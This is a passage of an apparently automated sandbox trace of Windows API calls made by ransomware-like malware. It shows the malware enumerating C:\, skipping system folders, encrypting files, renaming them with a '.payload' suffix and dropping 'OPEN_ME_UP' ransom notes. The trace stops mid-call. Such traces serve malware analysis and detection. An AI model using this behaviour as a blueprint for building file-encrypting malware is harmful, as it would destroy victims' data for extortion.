[0058.191] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.191] GetTickCount () returned 0x114efd0 [0058.191] GetTickCount () returned 0x114efd0 [0058.191] GetTickCount () returned 0x114efd0 [0058.191] GetTickCount () returned 0x114efd0 [0058.191] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.191] GetProcessHeap () returned 0x5e0000 [0058.191] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x641a90 [0058.191] ReadFile (in: hFile=0x438, lpBuffer=0x641a90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesRead=0x342f7e4*=0x241, lpOverlapped=0x0) returned 1 [0058.193] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffdbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.193] WriteFile (in: hFile=0x438, lpBuffer=0x641a90*, nNumberOfBytesToWrite=0x241, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesWritten=0x342f7e4*=0x241, lpOverlapped=0x0) returned 1 [0058.194] GetProcessHeap () returned 0x5e0000 [0058.194] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.194] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.194] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.194] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.194] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.194] CloseHandle (hObject=0x438) returned 1 [0058.195] GetProcessHeap () returned 0x5e0000 [0058.195] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x641a90 [0058.195] wnsprintfW (in: pszDest=0x641a90, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd_r00t_{nhhHyu}.payload") returned 72 [0058.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd_r00t_{nhhHyu}.payload" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd_r00t_{nhhhyu}.payload")) returned 1 [0058.195] GetProcessHeap () returned 0x5e0000 [0058.195] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.195] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0058.195] lstrcmpiW (lpString1="preoobe.cmd", lpString2="Windows") returned -1 [0058.195] lstrcmpiW (lpString1="preoobe.cmd", lpString2="$Recycle.bin") returned 1 [0058.195] lstrcmpiW (lpString1="preoobe.cmd", lpString2="System Volume Information") returned -1 [0058.195] lstrcmpiW (lpString1="preoobe.cmd", lpString2="Program Files") returned -1 [0058.195] lstrcmpiW (lpString1="preoobe.cmd", lpString2="Program Files (x86)") returned -1 [0058.195] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 37 [0058.195] StrStrIW (lpFirst="preoobe.cmd", lpSrch=".payload") returned 0x0 [0058.195] lstrcmpW (lpString1="preoobe.cmd", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.197] lstrcmpW (lpString1="preoobe.cmd", lpString2="taridd") returned -1 [0058.197] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.197] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.198] GetTickCount () returned 0x114efdf [0058.198] GetTickCount () returned 0x114efdf [0058.198] GetTickCount () returned 0x114efdf [0058.198] GetTickCount () returned 0x114efdf [0058.198] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.198] GetProcessHeap () returned 0x5e0000 [0058.198] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x641a90 [0058.198] ReadFile (in: hFile=0x438, lpBuffer=0x641a90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesRead=0x342f7e4*=0x4a, lpOverlapped=0x0) returned 1 [0058.199] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffffb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.199] WriteFile (in: hFile=0x438, lpBuffer=0x641a90*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesWritten=0x342f7e4*=0x4a, lpOverlapped=0x0) returned 1 [0058.199] GetProcessHeap () returned 0x5e0000 [0058.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.199] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.200] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.201] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.201] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.201] CloseHandle (hObject=0x438) returned 1 [0058.202] GetProcessHeap () returned 0x5e0000 [0058.202] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x641a90 [0058.202] wnsprintfW (in: pszDest=0x641a90, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd_r00t_{nhhHyu}.payload") returned 59 [0058.202] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd_r00t_{nhhHyu}.payload" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd_r00t_{nhhhyu}.payload")) returned 1 [0058.202] GetProcessHeap () returned 0x5e0000 [0058.202] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.202] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0058.202] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="Windows") returned -1 [0058.202] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="$Recycle.bin") returned 1 [0058.202] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="System Volume Information") returned -1 [0058.203] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="Program Files") returned 1 [0058.203] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="Program Files (x86)") returned 1 [0058.203] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 43 [0058.203] StrStrIW (lpFirst="SetupComplete.cmd", lpSrch=".payload") returned 0x0 [0058.203] lstrcmpW (lpString1="SetupComplete.cmd", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.203] lstrcmpW (lpString1="SetupComplete.cmd", lpString2="taridd") returned -1 [0058.203] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.203] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.203] GetTickCount () returned 0x114efdf [0058.203] GetTickCount () returned 0x114efdf [0058.203] GetTickCount () returned 0x114efdf [0058.203] GetTickCount () returned 0x114efdf [0058.204] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.204] GetProcessHeap () returned 0x5e0000 [0058.204] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x641a90 [0058.204] ReadFile (in: hFile=0x438, lpBuffer=0x641a90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesRead=0x342f7e4*=0x133, lpOverlapped=0x0) returned 1 [0058.205] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffecd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.205] WriteFile (in: hFile=0x438, lpBuffer=0x641a90*, nNumberOfBytesToWrite=0x133, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesWritten=0x342f7e4*=0x133, lpOverlapped=0x0) returned 1 [0058.205] GetProcessHeap () returned 0x5e0000 [0058.205] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.205] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.205] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.206] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.206] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.206] CloseHandle (hObject=0x438) returned 1 [0058.207] GetProcessHeap () returned 0x5e0000 [0058.207] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x641a90 [0058.207] wnsprintfW (in: pszDest=0x641a90, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd_r00t_{nhhHyu}.payload") returned 65 [0058.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd_r00t_{nhhHyu}.payload" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd_r00t_{nhhhyu}.payload")) returned 1 [0058.207] GetProcessHeap () returned 0x5e0000 [0058.207] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.207] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0058.207] FindClose (in: hFindFile=0x6066e0 | out: hFindFile=0x6066e0) returned 1 [0058.207] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 57 [0058.207] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\$getcurrent\\safeos\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.208] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.208] CloseHandle (hObject=0x430) returned 1 [0058.209] GetProcessHeap () returned 0x5e0000 [0058.209] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0058.209] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0058.209] FindClose (in: hFindFile=0x606be0 | out: hFindFile=0x606be0) returned 1 [0058.209] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 50 [0058.209] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\$getcurrent\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0058.209] WriteFile (in: hFile=0x424, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342fa74, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342fa74*=0x3a6, lpOverlapped=0x0) returned 1 [0058.210] CloseHandle (hObject=0x424) returned 1 [0058.210] GetProcessHeap () returned 0x5e0000 [0058.210] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x624df8 | out: hHeap=0x5e0000) returned 1 [0058.210] FindNextFileW (in: hFindFile=0x607020, lpFindFileData=0x342fd30 | out: lpFindFileData=0x342fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0058.210] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Windows") returned -1 [0058.210] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$Recycle.bin") returned 0 [0058.210] FindNextFileW (in: hFindFile=0x607020, lpFindFileData=0x342fd30 | out: lpFindFileData=0x342fd30*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0058.210] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="Windows") returned -1 [0058.210] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="$Recycle.bin") returned 1 [0058.210] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="System Volume Information") returned -1 [0058.210] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="Program Files") returned -1 [0058.210] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="Program Files (x86)") returned -1 [0058.210] wnsprintfW (in: pszDest=0x6288d8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 37 [0058.210] StrStrIW (lpFirst="$WINRE_BACKUP_PARTITION.MARKER", lpSrch=".payload") returned 0x0 [0058.210] lstrcmpW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0058.210] lstrcmpW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="taridd") returned -1 [0058.210] StrCmpNW (lpStr1="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.210] CreateFileW (lpFileName="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0058.225] GetTickCount () returned 0x114efff [0058.225] GetTickCount () returned 0x114efff [0058.225] GetTickCount () returned 0x114efff [0058.225] GetTickCount () returned 0x114efff [0058.226] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342fc40*, pdwDataLen=0x342fcf0*=0x2c, dwBufLen=0x80 | out: pbData=0x342fc40*, pdwDataLen=0x342fcf0*=0x80) returned 1 [0058.226] GetProcessHeap () returned 0x5e0000 [0058.226] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x641a90 [0058.226] ReadFile (in: hFile=0x424, lpBuffer=0x641a90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fcf4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesRead=0x342fcf4*=0x0, lpOverlapped=0x0) returned 1 [0058.226] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.226] WriteFile (in: hFile=0x424, lpBuffer=0x641a90*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x342fcf4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesWritten=0x342fcf4*=0x0, lpOverlapped=0x0) returned 1 [0058.226] GetProcessHeap () returned 0x5e0000 [0058.226] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.226] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.226] WriteFile (in: hFile=0x424, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fcf4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fcf4*=0x300, lpOverlapped=0x0) returned 1 [0058.228] WriteFile (in: hFile=0x424, lpBuffer=0x342fc40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fcf4, lpOverlapped=0x0 | out: lpBuffer=0x342fc40*, lpNumberOfBytesWritten=0x342fcf4*=0x80, lpOverlapped=0x0) returned 1 [0058.228] WriteFile (in: hFile=0x424, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fcf4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fcf4*=0x4, lpOverlapped=0x0) returned 1 [0058.228] CloseHandle (hObject=0x424) returned 1 [0058.229] GetProcessHeap () returned 0x5e0000 [0058.229] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x624df8 [0058.229] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER_r00t_{nhhHyu}.payload") returned 59 [0058.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), lpNewFileName="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER_r00t_{nhhHyu}.payload" (normalized: "c:\\$winre_backup_partition.marker_r00t_{nhhhyu}.payload")) returned 1 [0058.230] GetProcessHeap () returned 0x5e0000 [0058.230] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x624df8 | out: hHeap=0x5e0000) returned 1 [0058.230] FindNextFileW (in: hFindFile=0x607020, lpFindFileData=0x342fd30 | out: lpFindFileData=0x342fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0058.230] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Windows") returned -1 [0058.230] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="$Recycle.bin") returned 1 [0058.230] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="System Volume Information") returned -1 [0058.230] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Program Files") returned -1 [0058.230] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Program Files (x86)") returned -1 [0058.230] wnsprintfW (in: pszDest=0x6288d8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212") returned 25 [0058.230] lstrcmpW (lpString1="588bce7c90097ed212", lpString2=".") returned 1 [0058.230] lstrcmpW (lpString1="588bce7c90097ed212", lpString2="..") returned 1 [0058.230] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.230] GetProcessHeap () returned 0x5e0000 [0058.230] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x624df8 [0058.230] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\*") returned 27 [0058.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*", lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606be0 [0058.232] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.232] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.232] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.232] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.232] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.232] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\.") returned 27 [0058.232] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.232] FindNextFileW (in: 